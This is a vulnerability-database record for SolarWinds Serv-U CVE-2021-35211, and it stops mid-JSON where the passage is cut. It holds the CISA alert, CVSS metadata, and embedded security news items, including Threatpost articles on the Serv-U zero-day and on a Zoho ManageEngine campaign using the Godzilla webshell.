SolarWinds Releases Advisory for Serv-U Vulnerability

2021-07-13T00:00:00

Description

SolarWinds has released an [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) addressing a vulnerability—CVE-2021-35211—affecting Serv-U Managed File Transfer and Serv-U Secure FTP. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. Note: this vulnerability does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products. Microsoft [has reported](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) limited and targeted attacks using a 0-day exploit against this vulnerability. CISA encourages users and administrators to review the SolarWinds [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) and install the necessary updates. This product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy. **Please share your thoughts.** We recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/solarwinds-releases-advisory-serv-u-vulnerability>); we'd welcome your feedback.

{"id": "CISA:2E658D779271DB98A2BD53EE81F29F3B", "type": "cisa", "bulletinFamily": "info", "title": "SolarWinds Releases Advisory for Serv-U Vulnerability", "description": "SolarWinds has released an [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) addressing a vulnerability\u2014CVE-2021-35211\u2014affecting Serv-U Managed File Transfer and Serv-U Secure FTP. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. Note: this vulnerability does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products. \n \nMicrosoft [has reported](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) limited and targeted attacks using a 0-day exploit against this vulnerability.\n\nCISA encourages users and administrators to review the SolarWinds [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) and install the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/solarwinds-releases-advisory-serv-u-vulnerability>); we'd welcome your feedback.\n", "published": "2021-07-13T00:00:00", "modified": "2021-07-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/solarwinds-releases-advisory-serv-u-vulnerability", "reporter": "CISA", "references": ["https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211", "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211"], "cvelist": ["CVE-2021-35211"], "immutableFields": [], "lastseen": "2021-08-02T18:08:35", "viewCount": 75, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917"]}, {"type": "avleonov", "idList": ["AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0917"]}, {"type": "cve", "idList": ["CVE-2021-35211"]}, {"type": "githubexploit", "idList": ["15CF4822-F1E8-5BDB-8E65-8FC88F816E1E"]}, {"type": "hivepro", "idList": ["HIVEPRO:CFFBC7E8786DCD48596ACB491F713B13"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:C61940E0E1CB3ACBDD840B3497805A7E"]}, {"type": "mmpc", "idList": ["MMPC:79BA2A7EEC02196D9F15979AFB6BD9D2", "MMPC:C6E199EAD7CE978C9F1B558F17746AFD"]}, {"type": "mssecure", "idList": ["MSSECURE:79BA2A7EEC02196D9F15979AFB6BD9D2", "MSSECURE:C6E199EAD7CE978C9F1B558F17746AFD"]}, {"type": "nessus", "idList": ["SERVU_15_2_3_2.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:BA6A91F3A0B22C1BFF0C8A73D90FB362"]}, {"type": "thn", "idList": ["THN:05251A4D0E47381FEC6EC98D27F46C16", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:8636741FCF3A03B6238D8BAF1D9D00EB", "THN:D84F06239D4B68B06712C485E00D6D1F"]}, {"type": "threatpost", "idList": ["THREATPOST:529C328386588625C56031DEF4AB5D63", "THREATPOST:BC99709891AA93FC7767B53445FC2736"]}], "rev": 4}, "score": {"value": 2.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917"]}, {"type": "avleonov", "idList": ["AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0917"]}, {"type": "cve", "idList": ["CVE-2021-35211"]}, {"type": "githubexploit", "idList": ["15CF4822-F1E8-5BDB-8E65-8FC88F816E1E"]}, {"type": "hivepro", "idList": ["HIVEPRO:CFFBC7E8786DCD48596ACB491F713B13"]}, {"type": "ics", "idList": ["ICSA-20-282-02"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:C61940E0E1CB3ACBDD840B3497805A7E"]}, {"type": "mmpc", "idList": ["MMPC:79BA2A7EEC02196D9F15979AFB6BD9D2"]}, {"type": "mssecure", "idList": ["MSSECURE:79BA2A7EEC02196D9F15979AFB6BD9D2"]}, {"type": "nessus", "idList": ["SERVU_15_2_3_2.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:BA6A91F3A0B22C1BFF0C8A73D90FB362"]}, {"type": "thn", "idList": ["THN:05251A4D0E47381FEC6EC98D27F46C16", "THN:8636741FCF3A03B6238D8BAF1D9D00EB"]}, {"type": "threatpost", "idList": ["THREATPOST:529C328386588625C56031DEF4AB5D63", "THREATPOST:BC99709891AA93FC7767B53445FC2736", "THREATPOST:F7C1C6A7D07F7CFA8DFDD80051147A3B"]}]}, "exploitation": null, "vulnersScore": 2.5}, "wildExploited": true, "_state": {"wildexploited": 1647356733, "dependencies": 1647589307, "score": 1659753002}, "_internal": {"wildexploited_cvelist": ["CVE-2021-35211"]}}

{"malwarebytes": [{"lastseen": "2021-11-15T10:37:13", "description": "### Last week on Malwarebytes Labs\n\n * Multiple video games break after [domain name snafu](<https://blog.malwarebytes.com/privacy-2/2021/11/multiple-video-games-break-after-domain-name-snafu/>)\n * How to remove [adware on an Android phone](<https://blog.malwarebytes.com/101/how-tos/2021/11/how-to-remove-adware-on-an-android-phone/>)\n * [Smart TV adverts](<https://blog.malwarebytes.com/privacy-2/2021/11/smart-tv-adverts-put-a-wrinkle-in-your-programming/>) put a wrinkle in your programming\n * Are cybercriminals turning away from the US and [targeting Europe](<https://blog.malwarebytes.com/malwarebytes-news/2021/11/are-cybercriminals-turning-away-from-the-us-and-targeting-europe-instead/>) instead?\n * Patch now! [Microsoft plugs actively exploited zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/patch-now-microsoft-plugs-actively-exploited-zero-days-and-other-updates/>) and other updates\n * [Playstation 5 hacked](<https://blog.malwarebytes.com/hacking-2/2021/11/playstation-5-hacked-twice/>)\u2014twice!\n * Murder-for-hire, money laundering, and more: How [organised criminals work online](<https://blog.malwarebytes.com/reports/2021/11/murder-for-hire-money-laundering-and-more-how-organised-criminals-work-online/>)\n * Could Apple\u2019s new MacBooks signal a [change in direction on security](<https://blog.malwarebytes.com/mac/2021/11/do-apples-new-macbooks-signal-a-change-in-direction-on-security/>)?\n * The [importance of backing up](<https://blog.malwarebytes.com/101/2021/11/the-importance-of-backing-up/>)\n * A [multi-stage PowerShell](<https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/>) based attack targets Kazakhstan\n\nOn Malwarebytes' Lock and Code podcast episode S02E21 of this week we talked to Jess Dodson about "[Why we fail at getting the cybersecurity basics right.](<https://blog.malwarebytes.com/podcast/2021/11/why-we-fail-at-getting-the-cybersecurity-basics-right-with-jess-dodson-lock-and-code-s02e21/>)"\n\n### Other cybersecurity news\n\n * Romanian authorities arrested two individuals suspected of cyberattacks deploying the [Sodinokibi/REvil ransomware](<https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged>). (Source: Europol Newsroom)\n * The TOR project launched a new release:[ Tor Browser 11.0](<https://blog.torproject.org/new-release-tor-browser-11-0>) (Source: The TOR blog)\n * Threat actors are actively exploiting [ZOHO ManageEngine ADSelfService Plus vulnerability](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) in a targeted campaign. (Source: Microsoft Security blog) \n * [SolarWinds Serv-U vulnerability](<https://blog.fox-it.com/2021/11/08/ta505-exploits-solarwinds-serv-u-vulnerability-cve-2021-35211-for-initial-access/>) is used for initial access in Clop ransomware attacks. (Source: Fox IT)\n * Facebook whistleblower Frances Haugen warned that the [metaverse will gather even more personal information](<https://apnews.com/article/technology-lifestyle-business-only-on-ap-media-e4f03d38243552e46a77d0d3f0d45e3b>). (Source: AP news)\n * The US Treasury Department announced a set of actions focused on [disrupting criminal ransomware actors and virtual currency exchanges](<https://home.treasury.gov/news/press-releases/jy0471>) that launder the proceeds of ransomware. (Source: US Department of the Treasury)\n * A suspected state-sponsored threat actor has used Hong Kong pro-democracy news sites to deploy a [macOS zero-day exploit chain](<https://therecord.media/macos-zero-day-deployed-via-hong-kong-pro-democracy-news-sites/>). (Source: The Record)\n * [Void Balaur hackers-for-hire](<https://www.bleepingcomputer.com/news/security/void-balaur-hackers-for-hire-sell-stolen-mailboxes-and-private-data/>) sell stolen mailboxes and private data. (Source: Bleeping Computer)\n * [Queensland water supplier Sunwater](<https://www.abc.net.au/news/2021-11-11/qld-hackers-target-water-supplier-sunwater-cyber-security-attack/100610400>) targeted by hackers in months-long undetected cybersecurity breach. (Source: ABC.net.au news)\n * Missouri apologizes to 600,000 teachers who had [SSNs and private info exposed](<https://www.zdnet.com/article/missouri-apologizes-to-600k-teachers-who-had-ssns-and-private-info-exposed-offers-credit-monitoring/>). (Source: ZDNet)\n\nStay safe, everyone!\n\nThe post [A week in security (Nov 8 - Nov 14)](<https://blog.malwarebytes.com/a-week-in-security/2021/11/a-week-in-security-nov-8-nov-14-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-15T10:14:02", "type": "malwarebytes", "title": "A week in security (Nov 8 \u2013 Nov 14)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-11-15T10:14:02", "id": "MALWAREBYTES:C61940E0E1CB3ACBDD840B3497805A7E", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/11/a-week-in-security-nov-8-nov-14-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:30:37", "description": "A remote code execution vulnerability exists in SolarWinds Serv-U. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-05T00:00:00", "type": "checkpoint_advisories", "title": "SolarWinds Serv-U Remote Code Execution (CVE-2021-35211)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-12-05T00:00:00", "id": "CPAI-2021-0917", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-07-13T13:05:06", "description": "SolarWinds has issued a hotfix for a zero-day remote code execution (RCE) vulnerability already under active, yet limited, attack on some of the company\u2019s customers.\n\nMicrosoft alerted the company about the flaw, which affects its [Serv-U Managed File Transfer Server](<https://www.solarwinds.com/serv-u-managed-file-transfer-server>) and [Serv-U Secured FTP](<https://www.solarwinds.com/ftp-server-software>) products. Specifically, the vulnerability exists in the latest Serv-U version 15.2.3 HF1 released on May 5 of this year, as well as all prior versions, the company said in a [security advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) posted over the weekend.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft provided a proof-of-concept (PoC) exploit to SolarWinds, demonstrating how a threat actor who successfully exploits the vulnerability could run arbitrary code with privileges, according to the advisory.\n\n\u201cAn attacker could then install programs; view, change or delete data; or run programs on the affected system,\u201d the computing giant said.\n\nThough the current threat appears to be from a sole actor and \u201cinvolves a limited, targeted set of customers,\u201d SolarWinds wanted to remedy the situation before it could escalate, the company said. \u201cOur joint teams have mobilized to address it quickly,\u201d according to the advisory.\n\nSolarWinds does not currently know many customers may be directly affected by the flaw, nor has it identified the ones who were targeted. The company is recommending that all customers using the affected products update now, which can be done by accessing the company\u2019s [customer portal](<https://customerportal.solarwinds.com/>).\n\n## Unrelated to Supply-Chain Attack\n\nIndeed, SolarWinds likely still has fresh memories of a [global supply-chain attack](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) targeting the company\u2019s technology that was discovered late last year and stretched well into 2021. That attack occurred when [a state-sponsored APT](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>) injected malicious code into normal software updates for SolarWinds Orion network-management platform.\n\nSpecifically, attackers installed the Sunburst/Solorigate backdoor inside SolarWinds.Orion.Core.BusinessLayer.dll, a SolarWinds digitally signed component of Orion. From there, the threat actors mounted a [massive cyberespionage campaign](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that hit nine U.S. government agencies, Microsoft and other tech companies, as well as about 100 other victims.\n\nSolarWinds stressed in its advisory that the latest vulnerability is not related to that [previous scenario](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>) \u2014 which [cost the company $3.5 million](<https://d18rn0p25nwr6d.cloudfront.net/CIK-0001739942/48bd02f7-3c52-4abc-a5e9-60401f9a4e8b.pdf>) in investigation and remediation expenses \u2014 in any way.\n\n\u201cAll other SolarWinds and N-able (formerly SolarWinds MSP) are not affected** **by this vulnerability,\u201d the company wrote. \u201cThis includes the Orion Platform, and all Orion Platform modules.\u201d\n\nIn fact, the company even included a complete list of products \u201cnot known to be affected by this security vulnerability\u201d in the advisory for good measure, perhaps to stave off any potential panic or doubt that news of the latest vulnerability might inspire.\n\nIndeed, one security expert took to Twitter to advise organizations to keep a cool head over the news and take preemptive measures rather than raise an immediate alarm.\n\n\u201cI know there\u2019s a tendency to panic because it\u2019s SolarWinds \u2026 but I\u2019d suggest avoiding panic and taking proactive actions for defense and response instead,\u201d [tweeted](<https://twitter.com/likethecoins/status/1414681417053835265>) Katie Nickels, director of intel at security operations firm Red Canary.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-13T12:58:11", "type": "threatpost", "title": "SolarWinds Issues Hotfix for Zero-Day Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T12:58:11", "id": "THREATPOST:529C328386588625C56031DEF4AB5D63", "href": "https://threatpost.com/solarwinds-hotfix-zero-day-active-attack/167704/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-11-09T14:12:34", "description": "A new campaign is prying apart a known security vulnerability in the Zoho ManageEngine ADSelfService Plus password manager, researchers warned over the weekend. The threat actors have managed to exploit the Zoho weakness in at least nine global entities across critical sectors so far (technology, defense, healthcare, energy and education), deploying the Godzilla webshell and exfiltrating data.\n\nOn Sunday, Palo Alto Network\u2019s Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) that the targeted cyberespionage campaign is distinct from the ones that the FBI and [CISA warned about](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September.\n\nThe bug is a critical authentication bypass flaw \u2013 CVE-2021-40539 \u2013 that allows unauthenticated remote code execution (RCE). Zoho [patched](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) the vulnerability in September, but it\u2019s been actively exploited in the wild starting at least as early as August when it was a zero-day, opening the corporate doors to attackers who can run amok as they get free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nConsequences of a successful exploit can be significant: The Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application that can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\nCISA\u2019s alert explained that in the earlier attacks, state-backed, advanced persistent threats (APTs) were deploying a specific webshell and other techniques to maintain persistence in victim environments.\n\nNine days after the CISA alert, Unit 42 researchers saw yet another, unrelated campaign kick off starting on Sept. 17, as a different actor started scanning for unpatched servers. On Sept. 22, after five days of harvesting data on potential targets, exploitation attempts started up and likely continued into early October.\n\nUnit 42 researchers believe that the actor more or less indiscriminately targeted unpatched servers across the spectrum, from education to the Department of Defense, with scans of at least 370 Zoho ManageEngine servers in the U.S. alone.\n\n\u201cWhile we lack insight into the totality of organizations that were exploited during this campaign, we believe that, globally, at least nine entities across the technology, defense, healthcare, energy and education industries were compromised.\u201d they said.\n\n## Godzilla Webshell Does Some Heavy Lifting\n\nUnit 42 said that after threat actors exploited [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) to gain RCE, they quickly moved laterally to deploy several pieces of malware, relying particularly on the publicly available Godzilla webshell.\n\nThe actor uploaded several Godzilla variations to compromised servers and planted some new malware tools as well, including a custom Golang-based open-source backdoor called [NGLite](<https://github.com/Maka8ka/NGLite>) and a new credential-stealer that Unit 42 is tracking as KdcSponge.\n\n\u201cThe threat actors then used either the webshell or the NGLite payload to run commands and move laterally to other systems on the network, while they exfiltrated files of interest simply by downloading them from the web server,\u201d according to the analysis. After the actors pivoted to a domain controller, they installed the new KdcSponge stealer, which is designed to harvest usernames and passwords from domain controllers as accounts attempt to authenticate to the domain via Kerberos.\n\nBoth Godzilla and NGLite are written in Chinese and are free for the taking on GitHub.\n\n\u201cWe believe threat actors deployed these tools in combination as a form of redundancy to maintain access to high-interest networks,\u201d Unit 42 surmised. The researchers described Godzilla as something of a multi-function pocket knife of a webshell, noting that it \u201cparses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response.\u201d\n\nAs such, attackers can refrain from inflicting targeted systems with code that\u2019s likely to be flagged as malicious until they\u2019re ready to dynamically execute it, researchers said.\n\n## Using NKN to Communicate Is an Eye-Opener\n\n\u201cNGLite is characterized by its author as an \u2018anonymous cross-platform remote control program based on blockchain technology,'\u201d United 42 researchers Robert Falcone, Jeff White and Peter Renals explained. \u201cIt leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\u201d\n\nThe researchers noted that using NKN \u2013 a legitimate networking service that uses blockchain technology to support a decentralized network of peers \u2013 for a C2 channel is \u201cvery uncommon.\u201d\n\n\u201cWe have seen only 13 samples communicating with NKN altogether \u2013 nine NGLite samples and four related to a legitimate open-source utility called [Surge](<https://github.com/rule110-io/surge>) that uses NKN for file sharing.\u201d\n\n## Threat Actor Shares TTPs with Emissary Panda\n\nUnit 42 said the identity of the threat actor is unclear, but researchers saw [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and that of Threat Group 3390, aka [Emissary Panda](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>), APT27, Bronze Union and LuckyMouse), an APT that\u2019s been around since 2013 and which [is believed to operate from China](<https://threatpost.com/bronze-union-apt-updates-remote-access-trojans-in-fresh-wave-of-attacks/142219/>).\n\n\u201cSpecifically, as documented by SecureWorks in an article on a [previous TG-3390 operation](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>), we can see that TG-3390 similarly used web exploitation and another popular Chinese webshell called [ChinaChopper](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) for their initial footholds before leveraging legitimate stolen credentials for lateral movement and attacks on a domain controller,\u201d Unit 42 said. \u201cWhile the webshells and exploits differ, once the actors achieved access into the environment, we noted an overlap in some of their exfiltration tooling.\u201d\n\n110921 08:51 UPDATE: [Microsoft said](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) on Monday that it\u2019s attributing this campaign with high confidence to DEV-0322, a group operating out of China, \u201cbased on observed infrastructure, victimology, tactics, and procedures.\u201d\n\nMicrosoft\u2019s Threat Intelligence Center (MSTIC) has previously detected DEV-0322 taking part in attacks targeting the SolarWinds Serv-U software, which had a zero day \u2013 CVE-2021-35211, a remote memory escape \u2013 that SolarWinds [patched](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in July.\n\nMSTIC researchers said that the attacks in this new round of beating up Zoho password manager are installing a custom IIS module. IIS, or Internet Information Services, is an extensible web server software created by Microsoft for use with the Windows NT family.\n\nBesides the custom IIS module, DEV-0322 also deployed a trojan that MSTIC is calling Trojan:Win64/Zebracon that uses hardcoded credentials to make connections to suspected DEV-0322-compromised [Zimbra email servers.](<https://threatpost.com/zimbra-server-bugs-email-plundering/168188/>)\n\nIn its Sept. 16 alert, CISA recommended that organizations that spot indicators of compromise related to ManageEngine ADSelfService Plus should \u201ctake action immediately.\u201d\n\nAlso, CISA strongly recommended domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets, \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## Classic Cyberespionage Targets: Healthcare and Energy\n\nIf the actor behind this second Zoho-focused campaign does turn out to be a Chinese APT, it won\u2019t be surprising, some said. Dave Klein, cyber evangelist and director at [Cymulate](<https://cymulate.com/>), pointed to the People\u2019s Republic of China (PRC) having a well-documented, continued interest in healthcare and energy infrastructure data.\n\nHe pointed to the [2015 breach](<https://threatpost.com/5-6-million-fingerprints-stolen-in-opm-hack/114784/>) of the U.S. Office of Personnel Management (OPM) as an example. The massive breach was overwhelmingly [attributed](<https://www.washingtonpost.com/world/national-security/chinese-hackers-breach-federal-governments-personnel-office/2015/06/04/889c0e52-0af7-11e5-95fd-d580f1c5d44e_story.html?hpid=z1>) to the PRC. It included exquisitely sensitive information, including millions of federal employees\u2019 fingerprints, Social Security numbers, dates of birth, employee performance records, employment history, employment benefits, resumes, school transcripts, military service documentation and psychological data from interviews conducted by background investigators.\n\n\u201cThe PRC got into clearance background information data including very sensitive information. Subsequently in that case they were looking for weaknesses in US classified personnel \u2013 which would include health hardships \u2013 either personally or related to them,\u201d Klein told Threapost via email on Monday.\n\nHe noted that following the OPM breach, some healthcare agencies were subsequently breached, including [Anthem Health](<https://threatpost.com/chinese-hackers-anthem-data-breach-indicted/144572/>): an attack that affected more than 78 million people. \u201cThe interest in healthcare data globally continues not only for espionage purposes against targets \u2013 building an inventory of hardships/weak points as well as seeking out healthcare data to better serve their local industries,\u201d Klein noted. \u201cOn energy, the interest is both on stealing industrial espionage information as well as to set up compromises in critical infrastructures for potential use in cases of future hostilities.\u201d\n\n## If Patching Isn\u2019t Mandatory, a Breach Is a Given\n\nMike Denapoli, lead security architect at Cymulate, added that well-documented (and patched) vulnerabilities in massively popular platforms like Microsoft Exchange and MangeEngine are ripe fruit for threat actors to pluck. Organizations that can\u2019t or won\u2019t patch are sitting ducks, he said.\n\n\u201cFor whatever the reasons may be (downtime avoidance, fear over patches disrupting workflows, etc.), attackers know these systems are vulnerable, and are making sure to take advantage of any organization that doesn\u2019t keep patching updated,\u201d Denapoli told Threatpost. \u201cWe have reached the point where patching is a must \u2013 within a reasonable amount of time \u2013 and needs to be performed. While you don\u2019t have to patch immediately, you must patch regularly. Downtime is mandatory. Testing is mandatory. If not, then a breach is mandatory.\u201d\n\n_Image courtesy of [AlphaCoders](<https://wall.alphacoders.com/big.php?i=1012166>)._\n\n110821 12:24 UPDATE: Added input from Mike Denapoli and Dave Klein.\n\n**_Cybersecurity for multi-cloud environments is notoriously challenging. OSquery and CloudQuery is a solid answer. Join Uptycs and Threatpost on Tues., Nov. 16 at 2 p.m. ET for \u201c_**[**_An Intro to OSquery and CloudQuery_**](<https://bit.ly/3wf2vTP>)**_,\u201d a LIVE, interactive conversation with Eric Kaiser, Uptycs\u2019 senior security engineer, about how this open-source tool can help tame security across your organization\u2019s entire campus._**\n\n[**_Register NOW_**](<https://bit.ly/3wf2vTP>)**_ for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at _**[**_becky.bracken@threatpost.com_**](<mailto:becky.bracken@threatpost.com>)**_._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-08T16:38:05", "type": "threatpost", "title": "Zoho Password Manager Flaw Torched by Godzilla Webshell, New Data Stealer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211", "CVE-2021-40539"], "modified": "2021-11-08T16:38:05", "id": "THREATPOST:BC99709891AA93FC7767B53445FC2736", "href": "https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/", "cvss": {"score": 10.0, "vector": 